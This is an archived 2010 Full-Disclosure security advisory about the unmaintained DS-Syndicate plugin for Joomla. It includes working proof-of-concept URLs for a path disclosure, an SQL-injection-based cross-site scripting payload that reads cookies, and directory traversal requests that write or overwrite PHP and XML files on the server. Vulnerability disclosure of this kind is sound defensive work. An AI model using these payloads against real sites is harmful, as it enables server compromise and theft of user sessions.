lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002501cafac6$3648a6c0$010000c0@ml>
Date: Mon, 24 May 2010 01:20:41 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <full-disclosure@...ts.grok.org.uk>
Subject: New vulnerabilities in plugin DS-Syndicate for
	Joomla

Hello Full-Disclosure!

I want to warn you about new security vulnerabilities in plugin DS-Syndicate
for Joomla. It's my second advisory for DS-Syndicate.

-----------------------------
Advisory: New vulnerabilities in DS-Syndicate for Joomla
-----------------------------
URL: http://websecurity.com.ua/4224/
-----------------------------
Affected products: all versions of DS-Syndicate for Joomla.
-----------------------------
Timeline:

22.05.2010 - found vulnerabilities.
22.05.2010 - disclosed at my site.
23.05.2010 - informed developer (but as I wrote before, he didn't more
support this plugin).
-----------------------------
Details:

These are Full path disclosure, Cross-Site Scripting and Directory Traversal
vulnerabilities.

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=1%0A1

Even this FPD take place in the same script and in the same parameter, but
it shows a little more information then previous FPD and it appears not in
one, but in two scripts at once. So it needed to fix separately.

XSS (via SQLi + FPD):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,1,1,1,1,0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E,1,1,1,1,1,1,1,1,1,1,1,1,1,1%0A%23

At XSS (via SQLi) the code will not execute in browser (because xml is
shown), but at XSS (via SQLi + FPD) the code will execute in browser
(because html is shown). Only via SQL Injection it's not possible to conduct
XSS attack, because the code isn't executing in browser, but at using
together SQLi and FPD it's possible to conduct XSS attack.

Directory Traversal:

For writing of any files, particularly PHP scripts, and also for overwriting
any files at the server (at disabled magic quotes):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1.php%00

File available: http://site/1.php

For writing of xml-files - for conducting of XSS (via XML) and LFI attacks,
and also for overwriting of xml-files at the server:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1

File available: http://site/1.xml

For writing of PHP scripts and other files, and also for conducting of XSS
and LFI attacks it's needed to use one from parameters 2, 3, 6 or 18 of SQL
query.

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Note, that developer of the plugin don't support it anymore, so users of the
plugin need to fix it by themselves.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ